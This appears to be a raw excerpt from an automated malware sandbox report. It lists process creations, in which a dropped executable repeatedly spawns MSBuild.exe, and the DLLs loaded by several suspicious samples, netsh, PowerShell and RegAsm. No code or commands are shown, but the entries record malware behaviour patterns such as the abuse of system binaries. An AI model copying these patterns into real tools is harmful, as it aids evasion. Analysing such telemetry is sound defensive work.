Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dlnashext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wpdshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Section loaded: msasn1.dll
